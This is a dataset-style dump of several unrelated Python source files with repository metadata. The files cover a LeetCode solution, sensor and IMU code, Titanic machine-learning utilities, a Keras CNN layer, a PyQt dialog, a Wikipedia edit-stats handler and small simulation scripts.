def test_dag_pg_create_result(test_dag, context):
dag_result = test_dag.get_result(operator=None, result_name='test', context=context,
result_type=test_dag.result_type,
work_type=test_dag.work_type)
assert isinstance(dag_result, PgResult)
test_dag.clear_all_works(context)
| 41.714286 | 88 | 0.611546 | 0 | 0 | 0 | 0 | 1,788 | 0.874755 | 0 | 0 | 114 | 0.055773 |
a8094575efb5f9d3bcb611dcb83074209e70f07f | 478 | py | Python | Algorithms/Easy/830. Positions of Large Groups/answer.py | KenWoo/Algorithm | 4012a2f0a099a502df1e5df2e39faa75fe6463e8 | [
"Apache-2.0"
]
| null | null | null | Algorithms/Easy/830. Positions of Large Groups/answer.py | KenWoo/Algorithm | 4012a2f0a099a502df1e5df2e39faa75fe6463e8 | [
"Apache-2.0"
]
| null | null | null | Algorithms/Easy/830. Positions of Large Groups/answer.py | KenWoo/Algorithm | 4012a2f0a099a502df1e5df2e39faa75fe6463e8 | [
"Apache-2.0"
]
| null | null | null | from typing import List
class Solution:
def largeGroupPositions(self, S: str) -> List[List[int]]:
l = []
start = end = 0
while start < len(S):
while end < len(S) and S[start] == S[end]:
end += 1
if end - start >= 3:
l.append([start, end - 1])
start = end
return l
if __name__ == "__main__":
s = Solution()
result = s.largeGroupPositions("abc")
print(result)
| 22.761905 | 61 | 0.493724 | 343 | 0.717573 | 0 | 0 | 0 | 0 | 0 | 0 | 15 | 0.031381 |
a80a22c9f777e08edf7fe7ed83b93c4fd1e307bc | 1,727 | py | Python | imu.py | aume1/SatelliteTracker | 62725e1d1a72a1350b2af15d9e33fcd574ceb3a2 | [
"MIT"
]
| 2 | 2021-06-19T17:17:30.000Z | 2021-06-19T17:17:39.000Z | imu.py | aume1/SatelliteTracker | 62725e1d1a72a1350b2af15d9e33fcd574ceb3a2 | [
"MIT"
]
| null | null | null | imu.py | aume1/SatelliteTracker | 62725e1d1a72a1350b2af15d9e33fcd574ceb3a2 | [
"MIT"
]
| 1 | 2021-06-19T17:18:32.000Z | 2021-06-19T17:18:32.000Z | import time
import math
import py_qmc5883l
import pigpio
import adafruit_bmp280
from i2c_ADXL345 import ADXL345
import numpy as np
from i2c_ITG3205 import Gyro
class IMU:
def __init__(self, pi):
self.gyro = Gyro(pi)
self.accel = ADXL345(pi)
self.mag = py_qmc5883l.QMC5883L(pi)
rpy = list(self.get_roll_pitch_yaw())
self._prev_time = time.time()
def get_accel(self):
return self.accel.get_xyz_accel()
def get_gyro(self):
return self.gyro.get_rotations()
def get_mag(self):
return self.mag.get_dir()
def get_north(self):
D = self.get_accel()
D_mag = math.sqrt(D[0]**2 + D[1]**2 + D[2]**2)
D = [x/D_mag for x in D]
# D = [x for x in acc_unit] # used to be negative, flipped sensor so it is positive now
E = np.cross(D, self.get_mag()) # east is the cross-product of down and the direction of magnet
e_mag = math.sqrt(E[0]**2 + E[1]**2 + E[2]**2)
E /= e_mag
N = np.cross(E, D) # north is the cross-product of east and down
n_mag = math.sqrt(N[0] ** 2 + N[1] ** 2 + N[2] ** 2)
N /= n_mag
return N
def get_roll_pitch_yaw(self):
x, y, z = self.get_accel()
x_Buff = float(x)
y_Buff = float(y)
z_Buff = float(z)
roll = 180 + math.atan2(y_Buff, z_Buff) * 57.3
pitch = math.atan2((- x_Buff), math.sqrt(y_Buff * y_Buff + z_Buff * z_Buff)) * 57.3
if roll > 180:
roll -= 360
yaw = self.mag.get_bearing()
return roll, pitch, yaw
if __name__ == "__main__":
pi = pigpio.pi('192.168.178.229')
imu = IMU(pi)
while True:
print(imu.get_roll_pitch_yaw())
| 28.311475 | 104 | 0.579618 | 1,423 | 0.823972 | 0 | 0 | 0 | 0 | 0 | 0 | 223 | 0.129126 |
a80b6a8d0bacba13b3fe61daf36962d8ad3001a4 | 8,892 | py | Python | src/titanic/tit_utils.py | buffbob/titanic | 1e52814076ad78f6f9845d7b8f829889977a907b | [
"MIT"
]
| null | null | null | src/titanic/tit_utils.py | buffbob/titanic | 1e52814076ad78f6f9845d7b8f829889977a907b | [
"MIT"
]
| null | null | null | src/titanic/tit_utils.py | buffbob/titanic | 1e52814076ad78f6f9845d7b8f829889977a907b | [
"MIT"
]
| null | null | null | import pandas as pd
from sklearn.model_selection import GridSearchCV, train_test_split, cross_val_score
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import accuracy_score, classification_report
import matplotlib.pyplot as plt
import numpy as np
import category_encoders as ce
from sklearn.preprocessing import StandardScaler, LabelEncoder, OneHotEncoder, OrdinalEncoder
def load_tit(path):
"""
downloads data from kaggle stored at path = "../Data/"
returns a tuple of our titanic datasets- (train,test)
"""
train = pd.read_csv(path + 'tit_train.csv')
test = pd.read_csv(path + "tit_test.csv")
return (train, test)
def gscv_results_terse(model, params, X_train, y_train, X_test, y_test):
'''
clf = a classifier, params = a dict to feed to gridsearch_cv, score_list = list of evaluation metrics
nuff said
'''
scores = ["accuracy"]
for score in scores:
print("# Tuning hyper-parameters for %s" % score)
clf = GridSearchCV(model, params, cv=10,
scoring=score)
clf.fit(X_train, y_train)
print("Best parameters set found on development set: \n{}".format(clf.best_params_))
print('___________________________________')
print('cv scores on the best estimator')
scores = cross_val_score(clf.best_estimator_, X_train, y_train, scoring="accuracy", cv=10)
print(scores)
print('the average cv score is {:.3} with a std of {:.3}'.format(np.mean(scores), np.std(scores)))
return clf
def print_gscv_results(model, params, X_train, y_train, X_test, y_test):
'''
clf = a classifier, params = a dict to feed to gridsearch_cv, score_list = list of evaluation metrics
'''
scores = ["accuracy"]
for score in scores:
print("# Tuning hyper-parameters for %s" % score)
print()
clf = GridSearchCV(model, params, cv=5,
scoring=score)
clf.fit(X_train, y_train)
print("Best parameters set found on development set:")
print()
print(clf.best_params_)
print()
print("Grid scores on development set:")
print()
means = clf.cv_results_['mean_test_score']
stds = clf.cv_results_['std_test_score']
for mean, std, params in zip(means, stds, clf.cv_results_['params']):
print("%0.3f (+/-%0.03f) for %r"
% (mean, std * 2, params))
print()
print("Detailed classification report:")
print()
print("The model is trained on the full development set.")
print("The scores are computed on the full evaluation set.")
print()
y_true, y_pred = y_test, clf.predict(X_test)
print(classification_report(y_true, y_pred))
print('________________________________________________')
print('best params for model are {}'.format(clf.best_params_))
print('\n___________________________________\n')
print('cv scores on the best estimator')
scores = cross_val_score(clf.best_estimator_, X_train, y_train, scoring="accuracy", cv=10)
print(scores)
print('the average cv score is {:.2}\n\n'.format(np.mean(scores)))
return clf
def visualize_classifier(model, X, y, ax=None, cmap='rainbow'):
"""
X is a 2D dataset
nuf said
"""
ax = ax or plt.gca()
# Plot the training points
ax.scatter(X.iloc[:, 0], X.iloc[:, 1], c=y, s=30, cmap=cmap,
clim=(y.min(), y.max()), zorder=3)
ax.axis('tight')
ax.axis('off')
xlim = ax.get_xlim()
ylim = ax.get_ylim()
# fit the estimator
model.fit(X, y)
xx, yy = np.meshgrid(np.linspace(*xlim, num=200),
np.linspace(*ylim, num=200))
Z = model.predict(np.c_[xx.ravel(), yy.ravel()]).reshape(xx.shape)
# Create a color plot with the results
n_classes = len(np.unique(y))
contours = ax.contourf(xx, yy, Z, alpha=0.3,
levels=np.arange(n_classes + 1) - 0.5,
cmap=cmap, clim=(y.min(), y.max()),
zorder=1)
ax.set(xlim=xlim, ylim=ylim)
# this dataset has unique cols so we will go through one by one
def pp_Embarked(df):
"""
simply adds 'C' where missing values are present
inplace imputation
return df
"""
df.Embarked.fillna("C", inplace=True)
return df
def pp_Name(df):
"""
extracts the title from the Name column
returns- df with a new column named Title appended to original df
"""
temp = df.Name.apply(lambda x: x.split(',')[1].split(".")[0].strip())
df['Title'] = temp
return df
def pp_Age(df):
"""
imputes missing values of age through a groupby([Pclass,Title,isFemale])
returns df with new column named Age_nonull appended to it
"""
transformed_Age = df.groupby(["Title", 'Pclass', "Sex"])['Age'].transform(lambda x: x.fillna(x.median()))
df['Age_nonull'] = transformed_Age
return df
def pp_Fare(df):
'''
This will clip outliers to the middle 98% of the range
'''
temp = df['Fare'].copy()
limits = np.percentile(temp, [1, 99])
df.Fare = np.clip(temp, limits[0], limits[1])
return df
def pp_AgeBin(df):
"""
takes Age_nonull and puts in bins
returns df with new column- AgeBin
"""
z = df.Age_nonull.round() # some values went to 0 so clip to 1
binborders = np.linspace(0, 80, 17)
z = z.clip(1, None)
z = z.astype("int32")
df['AgeBin'] = pd.cut(z, bins=binborders, labels=False)
return df
def pp_Sex(df):
"""
maps male and female to 0 and 1
returns the df with is_Female added
"""
df['is_Female'] = df.Sex.apply(lambda row: 0 if row == "male" else 1) # one way
return df
def pp_Cabin(df):
"""
extracts the deck from the cabin. Mostly 1st class has cabin assignments. Replace
nan with "unk". Leaves as an ordinal categorical. can be onehoted later.
returns the df with Deck added as a column
"""
df["Deck"] = "UNK"
temp = df.loc[df.Cabin.notnull(), :].copy()
temp['D'] = temp.Cabin.apply(lambda z: z[0])
df.iloc[temp.index, -1] = temp["D"]
# df.where(df.Deck != "0", "UNK")
return df
def oneHot(df,col_list):
for col in col_list:
newcol_names = []
oh = OneHotEncoder(dtype="uint8",categories='auto')
# must convert df/series to array for onehot
vals = df[[col]].values
temp = oh.fit_transform(vals).toarray()#converts sparse to normal array
# the new names for columns
for name in oh.categories_[0]:
newcol_names.append(col + "_" + str(name))
tempdf = pd.DataFrame(temp, columns = newcol_names)
df = pd.concat([df, tempdf], axis=1)
return df
def scaleNumeric(df, cols):
"""
Standardize features by removing the mean and scaling to unit variance
"""
ss = StandardScaler()
scaled_features = ss.fit_transform(df[cols].values)
for i, col in enumerate(cols):
df[col + "_scaled"] = scaled_features[:, i]
return df
def chooseFeatures(df, alist):
"""
df is our dataframe with all new features added
alist is a list of cols to select for a new dataframe
returns df[alist]
"""
return df[alist]
def test_dtc(alist, df, labels):
"""
tests a decision tree model for classification
prints out way to much stuff
returns a GridSearchCV classifier
"""
a = df[alist] # select columns
X_train, X_test, y_train, y_test = train_test_split(a, labels, test_size=0.2, random_state=42)
dtc = DecisionTreeClassifier()
dtc_dict = dt_dict = [{"max_depth": [2, 5, 8, 12, 15], "min_samples_leaf": [1, 2, 3],
"max_features": [None, 1.0, 2, 'sqrt', X_train.shape[1]]}]
clf = gscv_results_terse(dtc, dtc_dict, X_train, y_train, X_test, y_test)
return clf
#########################################################
# some utilities functions to aid in ml in general
def lin_to_log_even(min_num, max_num, num_pts=10):
"""
This really only needed in min_num << 1 and min_max >> 1
creates an evenly spaced log space from min_num to max_num
"""
lmin = np.log10(min_num)
lmax = np.log10(max_num)
ls = np.linspace(lmin, lmax, num_pts)
log_spaces = np.power(10, ls)
# print(["{:05f}".format(each) for each in log_spaces])
return log_spaces
def lin_to_log_random(num1, num2, num_pts=10):
"""
This really only needed in min_num << 1 and min_max >> 1
creates an array of random selected pts of len num_pts
each point is in the log space from min_num to max_num
"""
ln1 = np.log10(num1)
ln2 = np.log10(num2)
range_bn = np.abs(ln2 - ln1)
z = ln2 + np.random.rand(num_pts) * -range_bn
zz = np.power(10, z)
print(["{:05f}".format(each) for each in zz])
return zz | 31.870968 | 109 | 0.624944 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,453 | 0.388327 |
a80bd9815a0efacc56fe16adf0b6e490442b6851 | 161 | py | Python | magic_markdown/__init__.py | transfluxus/magic_markdown | 3a71d0c0a0937dc87973b6e19389f27575e16208 | [
"MIT"
]
| 10 | 2019-04-09T17:33:52.000Z | 2021-05-10T04:58:59.000Z | magic_markdown/__init__.py | transfluxus/magic_markdown | 3a71d0c0a0937dc87973b6e19389f27575e16208 | [
"MIT"
]
| null | null | null | magic_markdown/__init__.py | transfluxus/magic_markdown | 3a71d0c0a0937dc87973b6e19389f27575e16208 | [
"MIT"
]
| null | null | null | name = "magic_markdown"
from magic_markdown.MagicMarkdown import MagicMarkdown
def load_ipython_extension(ipython):
ipython.register_magics(MagicMarkdown)
| 23 | 54 | 0.838509 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 16 | 0.099379 |
a80cfdeae5dd9779dfdf75f7f464b230527883ae | 1,167 | py | Python | src/Tests/power_generators_tests/solar_panel_tests/solar_panel_east_west_test.py | BoKleynen/P-O-3-Smart-Energy-Home | 4849038c47199aa0a752ff5a4f2afa91f4a9e8f0 | [
"MIT"
]
| null | null | null | src/Tests/power_generators_tests/solar_panel_tests/solar_panel_east_west_test.py | BoKleynen/P-O-3-Smart-Energy-Home | 4849038c47199aa0a752ff5a4f2afa91f4a9e8f0 | [
"MIT"
]
| null | null | null | src/Tests/power_generators_tests/solar_panel_tests/solar_panel_east_west_test.py | BoKleynen/P-O-3-Smart-Energy-Home | 4849038c47199aa0a752ff5a4f2afa91f4a9e8f0 | [
"MIT"
]
| null | null | null | import matplotlib.pyplot as plt
import pandas as pd
from house.production.solar_panel import SolarPanel
from house import House
from math import pi
from time import time
start_time = time()
solar_panel_east = SolarPanel(285.0, 10*pi/180, -pi/2, 0.87, 1.540539, 10)
solar_panel_west = SolarPanel(285.0, 10*pi/180, pi/2, 0.87, 1.540539, 10)
house = House([], solar_panel_tp=(solar_panel_east, solar_panel_west))
irradiance_df = pd.read_csv(filepath_or_buffer="C:\\Users\\Lander\\Documents\\KULeuven\\2e bachelor\\semester 1\\P&O 3\\P-O-3-Smart-Energy-Home\\data\\Irradiance.csv",
header=0,
index_col="Date/Time",
dtype={"watts-per-meter-sq": float},
parse_dates=["Date/Time"]
)
start = pd.Timestamp("2016-06-17 00:00:00")
# end = pd.Timestamp("2017-04-21 23:55:00")
end = pd.Timestamp("2016-06-17 23:55:00")
times = pd.date_range(start, end, freq="300S")
data = [house.power_production(t, irradiance_df) for t in pd.date_range(start, end, freq="300S")]
# print(data)
plt.plot(data)
print(time() - start_time)
plt.show()
| 33.342857 | 167 | 0.642674 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 271 | 0.232219 |
a813a7003f5f5d2c9a1b282747c12188d836b770 | 2,468 | py | Python | src/lsct/models/cnn_1d.py | junyongyou/lsct_phiqnet | ffa546b3225c7db0bc7977565dc11a91186fe939 | [
"MIT"
]
| 9 | 2021-11-01T06:06:33.000Z | 2022-02-07T12:21:18.000Z | src/lsct/models/cnn_1d.py | junyongyou/lsct_phiqnet | ffa546b3225c7db0bc7977565dc11a91186fe939 | [
"MIT"
]
| null | null | null | src/lsct/models/cnn_1d.py | junyongyou/lsct_phiqnet | ffa546b3225c7db0bc7977565dc11a91186fe939 | [
"MIT"
]
| 1 | 2022-03-06T07:38:32.000Z | 2022-03-06T07:38:32.000Z | from tensorflow.keras.layers import Layer, Conv1D, Input, Dropout, MaxPool1D, Masking
import tensorflow.keras.backend as K
from tensorflow.keras import Model
import tensorflow as tf
class CNN1D(Layer):
def __init__(self, filters=(32, 64), pooling_sizes=(4, 4), kernel_size=3, stride_size=1, using_dropout=True,
using_bias=False, dropout_rate=0.1, **kwargs):
"""
1D CNN model
:param filters: filter numbers in the CNN blocks
:param pooling_sizes: max pooling size in each block
:param kernel_size: kernel size of CNN layer
:param stride_size: stride of CNN layer
:param using_dropout: flag to use dropout or not
:param using_bias: flag to use bias in CNN or not
:param dropout_rate: dropout rate if using it
:param kwargs: other config prams
"""
self.filters = filters
self.kernel_size = kernel_size
self.stride_size = stride_size
self.using_dropout = using_dropout
self.conv1d = []
self.pooling = []
self.dropout = []
for i, s_filter in enumerate(filters):
self.conv1d.append(Conv1D(s_filter,
kernel_size,
padding='same',
strides=stride_size,
use_bias=using_bias,
name='conv{}'.format(i)
))
self.pooling.append(MaxPool1D(pool_size=pooling_sizes[i], name='pool{}'.format(i)))
if using_dropout:
self.dropout = Dropout(rate=dropout_rate)
super(CNN1D, self).__init__(**kwargs)
def build(self, input_shape):
super(CNN1D, self).build(input_shape)
def call(self, x, mask=None):
for i in range(len(self.conv1d)):
x = self.conv1d[i](x)
x = self.pooling[i](x)
if self.using_dropout:
x = self.dropout(x)
x = K.squeeze(x, axis=-2)
return x
def compute_output_shape(self, input_shape):
return 1, self.filters[-1]
if __name__ == '__main__':
input_shape = (16, 5 * 256)
filters = [32, 64, 128, 256]
pooling_sizes = [2, 2, 2, 2]
inputs = Input(shape=input_shape)
x = CNN1D(filters=filters, pooling_sizes=pooling_sizes)(inputs)
model = Model(inputs=inputs, outputs=x)
model.summary()
| 37.393939 | 112 | 0.573339 | 1,986 | 0.8047 | 0 | 0 | 0 | 0 | 0 | 0 | 498 | 0.201783 |
a81433a2173979769be9813ef0e72f88f835d3f9 | 339 | py | Python | 1 clean code/auto_format_on_save.py | philippschmalen/ml-devops-engineer | 98c4c94b807215e2a909905235bde4a8d022477f | [
"MIT"
]
| null | null | null | 1 clean code/auto_format_on_save.py | philippschmalen/ml-devops-engineer | 98c4c94b807215e2a909905235bde4a8d022477f | [
"MIT"
]
| null | null | null | 1 clean code/auto_format_on_save.py | philippschmalen/ml-devops-engineer | 98c4c94b807215e2a909905235bde4a8d022477f | [
"MIT"
]
| null | null | null | """
Play with autoformatting on save
Ensure to pip install black within your environment
"""
# test linting with an unnecessary import
# it should complain and suggest a solution
import sys
thisdict = {
"brand": "Ford",
"model": "Mustang",
"year": 1964,
"okay": "This is getting way too long",
}
def hello():
pass
| 16.142857 | 51 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 247 | 0.728614 |
a81435452d7a1fd0220c50904adbc5e774a45f27 | 931 | py | Python | test/utils.py | eddrial/aapy | 929f554aea24c0a893052f0907488e0a843fd5dd | [
"Apache-2.0"
]
| null | null | null | test/utils.py | eddrial/aapy | 929f554aea24c0a893052f0907488e0a843fd5dd | [
"Apache-2.0"
]
| null | null | null | test/utils.py | eddrial/aapy | 929f554aea24c0a893052f0907488e0a843fd5dd | [
"Apache-2.0"
]
| null | null | null | import json
import os
import mock
def mock_response(json_str=None, raw=None):
resp = mock.MagicMock()
if json_str is not None:
loaded_json = json.loads(json_str)
resp.json = mock.MagicMock(return_value=loaded_json)
if raw is not None:
resp.raw = mock.MagicMock()
resp.raw.read = mock.MagicMock(return_value=raw)
return resp
def get_data_filepath(filename):
"""Construct filepath for a file in the test/data directory
Args:
filename: name of file
Returns:
full path to file
"""
return os.path.join(os.path.dirname(__file__), 'data', filename)
def load_from_file(filename):
"""Load the contents of a file in the data directory.
Args:
filename: name of file to load
Returns:
contents of file as a string
"""
filepath = get_data_filepath(filename)
with open(filepath) as f:
return f.read()
| 21.159091 | 68 | 0.651987 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 317 | 0.340494 |
a81666f0e6701e07b7dd6f00c88fe2096ec32290 | 391 | py | Python | archive/AIAP_v1.00/v1.2b/promoter_bin.py | ShaopengLiu1/Zhanglab_ATAC-seq_analysis | 3f615c159bb04fcc3f7b777e00c5f04ff105898c | [
"MIT"
]
| null | null | null | archive/AIAP_v1.00/v1.2b/promoter_bin.py | ShaopengLiu1/Zhanglab_ATAC-seq_analysis | 3f615c159bb04fcc3f7b777e00c5f04ff105898c | [
"MIT"
]
| null | null | null | archive/AIAP_v1.00/v1.2b/promoter_bin.py | ShaopengLiu1/Zhanglab_ATAC-seq_analysis | 3f615c159bb04fcc3f7b777e00c5f04ff105898c | [
"MIT"
]
| 1 | 2018-02-26T03:14:46.000Z | 2018-02-26T03:14:46.000Z | import sys
peak=[]
with open(sys.argv[1],'r') as f:
for line in f:
line=line.strip('\n').split('\t')
peak.append(int(line[3]))
f.close()
num=int(len(peak)/100.0)
bin=[]
for i in range(99):
bin.append(str(i+1)+'\t'+str(sum(peak[num*i:num*(i+1)])/(num*1.0))+'\n')
bin.append('100'+'\t'+str(sum(peak[num*99:])/(num*1.0))+'\n')
with open('bin.txt','w') as f:
f.writelines(bin)
f.close
| 20.578947 | 73 | 0.59335 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 44 | 0.112532 |
a8172aac1601eb8a00a3b924aa63876138f48a83 | 1,347 | py | Python | Code/Database Creator/examples.py | Storm-Petrel/HawkEye | f9afde3866ab9e5e71de7f2be4d836be9ed48d69 | [
"MIT"
]
| null | null | null | Code/Database Creator/examples.py | Storm-Petrel/HawkEye | f9afde3866ab9e5e71de7f2be4d836be9ed48d69 | [
"MIT"
]
| null | null | null | Code/Database Creator/examples.py | Storm-Petrel/HawkEye | f9afde3866ab9e5e71de7f2be4d836be9ed48d69 | [
"MIT"
]
| null | null | null | import csv
from faker import Faker
fake = Faker()
for x in range(0, 10):
placa = fake.pystr(min_chars=3, max_chars=3).upper() + str(fake.pydecimal(left_digits=1, right_digits=1, positive=True)) + str(fake.pydecimal(left_digits=1, right_digits=1, positive=True))
placa = placa.replace(".","")
atualLat = str(fake.geo_coordinate(center=-8.059845, radius=0.001))
atualLon = str(fake.geo_coordinate(center=-34.905552, radius=0.001))
geo0Lat = str(fake.geo_coordinate(center=-8.021154, radius=0.001))
geo0Lon = str(fake.geo_coordinate(center=-34.933909, radius=0.001))
geo1Lat = str(fake.geo_coordinate(center=-8.027868, radius=0.001))
geo1Lon = str(fake.geo_coordinate(center=-34.852109, radius=0.001))
geo2Lat = str(fake.geo_coordinate(center=-8.122738, radius=0.001))
geo2Lon = str(fake.geo_coordinate(center=-34.874526, radius=0.001))
geo3Lat = str(fake.geo_coordinate(center=-8.052431, radius=0.001))
geo3Lon = str(fake.geo_coordinate(center=-34.959744, radius=0.001))
csvRow = [placa,atualLat,atualLon,geo0Lat,geo0Lon,geo1Lat,geo1Lon,geo2Lat,geo2Lon,geo3Lat,geo3Lon,"0","0"]
with open('cars.csv', 'a', newline='\n') as csvfile:
spamwriter = csv.writer(csvfile, delimiter=',',quotechar='|',quoting=csv.QUOTE_MINIMAL)
spamwriter.writerow(csvRow)
| 51.807692 | 193 | 0.697847 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 34 | 0.025241 |
a8178087a6d24532c3fa392eae43c6d6a8b30612 | 4,595 | py | Python | MultiInputDialog.py | chemmatcars/XModFit | 7d1298448d1908d78797fd67ce0a00ecfaf17629 | [
"MIT"
]
| null | null | null | MultiInputDialog.py | chemmatcars/XModFit | 7d1298448d1908d78797fd67ce0a00ecfaf17629 | [
"MIT"
]
| 2 | 2019-07-31T23:14:14.000Z | 2020-12-26T16:27:02.000Z | MultiInputDialog.py | chemmatcars/XModFit | 7d1298448d1908d78797fd67ce0a00ecfaf17629 | [
"MIT"
]
| 2 | 2019-07-31T22:22:06.000Z | 2020-07-14T04:58:16.000Z | from PyQt5.QtWidgets import QWidget, QApplication, QPushButton, QLabel, QLineEdit, QVBoxLayout, QMessageBox, QCheckBox,\
QSpinBox, QComboBox, QListWidget, QDialog, QFileDialog, QProgressBar, QTableWidget, QTableWidgetItem,\
QAbstractItemView, QSpinBox, QSplitter, QSizePolicy, QAbstractScrollArea, QHBoxLayout, QTextEdit, QShortcut,\
QProgressDialog
from PyQt5.QtGui import QPalette, QKeySequence, QDoubleValidator, QIntValidator
from PyQt5.QtCore import Qt, QThread, QSignalMapper
import sys
import pyqtgraph as pg
class MultiInputDialog(QDialog):
def __init__(self, inputs={'Input':'default value'}, title='Multi Input Dialog', parent=None):
QDialog.__init__(self, parent)
self.setWindowTitle(title)
self.inputs=inputs
self.intValidator = QIntValidator()
self.floatValidator = QDoubleValidator()
self.createUI()
def createUI(self):
self.vblayout = QVBoxLayout(self)
self.layoutWidget = pg.LayoutWidget()
self.vblayout.addWidget(self.layoutWidget)
self.labels={}
self.inputFields={}
for key, value in self.inputs.items():
self.labels[key] = QLabel(key)
self.layoutWidget.addWidget(self.labels[key])
if type(value)==int:
self.signalMapper1 = QSignalMapper(self)
self.inputFields[key]=QLineEdit(str(value))
self.inputFields[key].setValidator(self.intValidator)
self.inputFields[key].textChanged.connect(self.signalMapper1.map)
self.signalMapper1.setMapping(self.inputFields[key], key)
self.signalMapper1.mapped[str].connect(self.inputChanged)
elif type(value)==float:
self.signalMapper2 = QSignalMapper(self)
self.inputFields[key]=QLineEdit(str(value))
self.inputFields[key].setValidator(self.floatValidator)
self.inputFields[key].textChanged.connect(self.signalMapper2.map)
self.signalMapper2.setMapping(self.inputFields[key], key)
self.signalMapper2.mapped[str].connect(self.inputChanged)
elif type(value)==bool:
self.signalMapper3 = QSignalMapper(self)
self.inputFields[key]=QCheckBox()
self.inputFields[key].setTristate(False)
self.inputFields[key].stateChanged.connect(self.signalMapper3.map)
self.signalMapper3.setMapping(self.inputFields[key], key)
self.signalMapper3.mapped[str].connect(self.inputStateChanged)
elif type(value)==str:
self.signalMapper4 = QSignalMapper(self)
self.inputFields[key] = QLineEdit(value)
self.inputFields[key].textChanged.connect(self.signalMapper4.map)
self.signalMapper4.setMapping(self.inputFields[key], key)
self.signalMapper4.mapped[str].connect(self.inputChanged)
elif type(value)==list:
self.signalMapper5 = QSignalMapper(self)
self.inputFields[key] = QComboBox()
self.inputFields[key].addItems(value)
self.inputFields[key].currentTextChanged.connect(self.signalMapper5.map)
self.signalMapper5.setMapping(self.inputFields[key], key)
self.signalMapper5.mapped[str].connect(self.inputTextChanged)
self.layoutWidget.addWidget(self.inputFields[key])
self.layoutWidget.nextRow()
self.layoutWidget.nextRow()
self.cancelButton = QPushButton('Cancel')
self.cancelButton.clicked.connect(self.cancelandClose)
self.layoutWidget.addWidget(self.cancelButton, col=0)
self.okButton = QPushButton('OK')
self.okButton.clicked.connect(self.okandClose)
self.layoutWidget.addWidget(self.okButton, col=1)
self.okButton.setDefault(True)
def inputChanged(self, key):
self.inputs[key]=self.inputFields[key].text()
def inputStateChanged(self, key):
if self.inputFields[key].checkState():
self.inputs[key]=True
else:
self.inputs[key]=False
def inputTextChanged(self, key):
self.inputs[key]=self.inputFields[key].currentText()
print(self.inputs[key])
def okandClose(self):
self.accept()
def cancelandClose(self):
self.reject()
if __name__=='__main__':
app = QApplication(sys.argv)
dlg = MultiInputDialog(inputs={'value':100,'value2':10.0,'fit':True,'func':['Lor','Gau']})
dlg.show()
sys.exit(app.exec_()) | 47.864583 | 120 | 0.654189 | 3,871 | 0.842437 | 0 | 0 | 0 | 0 | 0 | 0 | 100 | 0.021763 |
a81b25109e2c25d80338be4ee486823e581a2347 | 3,813 | py | Python | src/handlers.py | jneethling/WikiStats | 232640bf3799851554fa4c13cee8a7f63eb532e2 | [
"MIT"
]
| null | null | null | src/handlers.py | jneethling/WikiStats | 232640bf3799851554fa4c13cee8a7f63eb532e2 | [
"MIT"
]
| 1 | 2022-01-09T12:07:13.000Z | 2022-01-09T15:29:41.000Z | src/handlers.py | jneethling/WikiStats | 232640bf3799851554fa4c13cee8a7f63eb532e2 | [
"MIT"
]
| null | null | null | import os
import psutil
import json
import sqlite3
import threading
from datetime import datetime, timezone
from websocket import create_connection
class CustomHandler:
def __init__(self):
self.working = False
self.counter = 0
self.ws = None
if self.dbReady('./data/wiki_statsDB'):
self.setStatus(True, 'Function handler on standby')
else:
self.setStatus(False, 'Database error, cannot start service')
def dbReady(self, path) -> bool:
try:
self.db = sqlite3.connect(path, check_same_thread=False)
self.cursor = self.db.cursor()
self.cursor.execute('''CREATE TABLE IF NOT EXISTS stats(\
id INTEGER PRIMARY KEY,\
country_name TEXT,\
change_size INTEGER)''')
self.db.commit()
return True
except sqlite3.OperationalError:
return False
def worker(self, stop_event):
while not stop_event.is_set():
result = self.ws.recv()
country = None
if "geo_ip" in result:
j_dict = json.loads(result)
geo = j_dict.get("geo_ip")
country = geo.get("country_name")
change = j_dict.get("change_size")
if change is None:
change = 0
if country is not None:
self.cursor.execute('''INSERT INTO stats(country_name, change_size) VALUES(?,?)''', (country, change))
self.db.commit()
self.counter += 1
def setStatus(self, status, msg):
self.status = status
self.message = msg
def getStatus(self) -> json:
stat_result = os.stat('./data/wiki_statsDB')
modified = datetime.fromtimestamp(stat_result.st_mtime, tz=timezone.utc).strftime("%m/%d/%Y, %H:%M:%S")
msg = {"Status": self.status, "Message": self.message, "Working in background": self.working, "Records in session": self.counter, "DB size (bytes)": stat_result.st_size, "Modified": modified}
return msg
def getMemory(self) -> json:
memory = 1024 * 1024
proc = psutil.Process(os.getpid())
mem0 = proc.memory_info().rss
msg = str(mem0/memory) + 'Mb'
return {'Memory use': msg}
def getTotals(self) -> json:
data = {}
self.cursor.execute('''SELECT country_name, SUM(change_size) FROM stats GROUP BY country_name''')
for row in self.cursor:
data[row[0]] = row[1]
msg = json.dumps(data)
return msg
def getCounts(self) -> json:
data = {}
self.cursor.execute('''SELECT country_name, COUNT(country_name) FROM stats GROUP BY country_name''')
for row in self.cursor:
data[row[0]] = row[1]
msg = json.dumps(data)
return msg
def stopWork(self) -> json:
self.ws.close
self.working = False
self.kill_switch.set()
self.t.join()
self.setStatus(True, 'Function handler on standby')
msg = 'Function handler background work stopped'
return {'message': msg}
def startWork(self) -> json:
if self.working:
msg = 'Function handler already working in background, ignoring request'
return {"message": msg}
else:
self.ws = create_connection("ws://wikimon.hatnote.com:9000")
self.working = True
self.setStatus(True, 'Function handler working in background')
self.kill_switch = threading.Event()
self.t = threading.Thread(target=self.worker, args=(self.kill_switch,))
self.t.start()
msg = 'Function handler background work started'
return {'message': msg}
| 32.87069 | 199 | 0.575924 | 3,654 | 0.958301 | 0 | 0 | 0 | 0 | 0 | 0 | 911 | 0.238919 |
a81d611063f78006b5948c72bc4dd6b96d015544 | 1,035 | py | Python | simulate/continue.py | kmckiern/scripts | acc8326ca653d804ee06752af9e7f5b011fc6e0e | [
"MIT"
]
| 2 | 2015-04-27T01:57:43.000Z | 2015-05-01T18:18:56.000Z | simulate/continue.py | kmckiern/scripts | acc8326ca653d804ee06752af9e7f5b011fc6e0e | [
"MIT"
]
| null | null | null | simulate/continue.py | kmckiern/scripts | acc8326ca653d804ee06752af9e7f5b011fc6e0e | [
"MIT"
]
| null | null | null | from __future__ import print_function
from simtk.openmm import app
import simtk.openmm as mm
from simtk import unit
